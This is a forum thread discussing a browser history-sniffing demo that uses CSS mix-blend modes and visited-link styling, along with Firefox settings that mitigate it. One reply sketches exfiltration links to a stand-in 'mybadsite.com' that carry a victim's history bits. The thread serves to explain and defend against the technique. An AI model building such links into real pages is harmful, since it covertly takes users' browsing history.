Jump to content
Strawberry Orange Banana Lime Leaf Slate Sky Blueberry Grape Watermelon Chocolate Marble
Strawberry Orange Banana Lime Leaf Slate Sky Blueberry Grape Watermelon Chocolate Marble

MSFN is made available via donations, subscriptions and advertising revenue. The use of ad-blocking software hurts the site. Please disable ad-blocking software or set an exception for MSFN. Alternatively, register and become a site sponsor/subscriber and ads will be disabled automatically. 


Sign in to follow this  
Mathwiz

Clever hack can trick Web surfers into revealing their browsing history

Recommended Posts

This is a couple of years old, so apologies if it's already been discussed; but I just ran across this last night.

(BTW, this doesn't work in IE, or in Edge - yet - but works in Chrome, other Chromium derivatives like Opera, and FF and its derivatives.)

This demo appears at first to be a "whack-a-mole" game: you're supposed to click the "mole" as quickly as possible. But try it: when you click the "mole," it will pop up a list of these nine Web pages:

https://www.cnn.com
https://news.ycombinator.com
https://www.reddit.com
https://www.amazon.com
https://twitter.com/lcamtuf
https://www.donaldjtrump.com
https://www.farmersonly.com
https://www.diapers.com

... and will tell you which ones you've visited!

How it works: rather than being random, the mole's position depends on which combination of the above Web sites you've visited. Since there are nine Web sites, there are 2^9 or 512 possible visited/not visited combinations. So the demo actually shows 512 moles, one for each possible combination, and uses CSS "mix blend modes" to ensure only one mole is visible: the one that corresponds to your particular browsing history. Read the author's blog post for more details.

Note that although this demo uses Javascript to reveal the results, collecting the info only required HTML, CSS, and a means to convince you to click the right spot on the page, so add-ons like Noscript won't protect you. If this were a truly deceptive web page, you could imagine revealing whether you've visited any of hundreds of Web sites by playing the "game" (or by clicking apparently-innocuous links or buttons at the deceptive Web site) for a few minutes.

Countermeasures and Mitigations

There are a couple of obvious countermeasures, but you'd have to give up some functionality. You could just disable flagging visited links: in FF, toggle layout.css.visited_links_enabled in about:config to "false." In the demo, the mole will now always appear in the "no links visited" position.

Or you could give up mix blend mode instead: again in FF, toggle layout.css.mix-blend-mode.enabled to "false." This disables the "game:" the "mole" is gone, replaced with a white rectangle; but I'd wager that 99% of legit Web sites wouldn't be significantly affected. (A few might display slightly "funny" but should work OK. Besides, they'd look that way under IE/Edge anyhow, unless they have IE/Edge-specific coding, and in that case, an IE-like SSUAO is all you'd need to fix the site.)

Finally, there's a weakness in this method that makes it a bit less revealing than you might think. When I first tried it, I was surprised to learn that I hadn't visited any of the above Web sites, even though I know I at least visit amazon.com rather often. But it didn't show as "visited" because I use a bookmark to go to amazon.com, which actually goes to https://www.amazon.com/?.... Since the demo page couldn't guess the entire long string, my browser didn't show https://www.amazon.com by itself as "visited." So maybe the best mitigation is just to append a ? and some extra random garbage to all your bookmarks!

Share this post


Link to post
Share on other sites

The problem is that this demo displays data only locally, no request is sent back.

And if it was, I'd assume it could have been blocked by specific rule in uBlock, as it is already nicely recognized as inline-script.

Share this post


Link to post
Share on other sites

The demo is designed just to show what's possible; it's not designed to actually steal your browsing history! So of course no request is sent back.

6 hours ago, Mathwiz said:

... although this demo uses Javascript to reveal the results, collecting the info only required HTML, CSS, and a means to convince you to click the right spot on the page, so add-ons like Noscript won't protect you.

IOW, the "moles" could've been 512 simple links, from ...

<a href="http://mybadsite.com?user=victim1&historyBits=000" />
         ... through ...
<a href="http://mybadsite.com?user=victim1&historyBits=511" />

... so when you click one, the server just collects your data and goes to the next page.

And the demo runs fine with all of uBO's filters enabled. There's really nothing for uBO to block; that's what makes it potentially dangerous.

Share this post


Link to post
Share on other sites

Except from specific domain and specific get request to this domain? :P

uBo blocks nothing because why should it block tests site.

Share this post


Link to post
Share on other sites

Well, at the end of the day, all I can do is let folks know a potential security exposure exists. I can't make anyone understand it, or take it seriously.... :dubbio:

Share this post


Link to post
Share on other sites

Sure, no harm's done :)

The only problem I see is that in spying advertising industry changes are quick. If this technique has great potential, it would have been already used by tech companies to track users, and if this was true, tracker-blockers would have already prepared for an update :)

After all, worth knowing, but no reason to panic.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

×
×
  • Create New...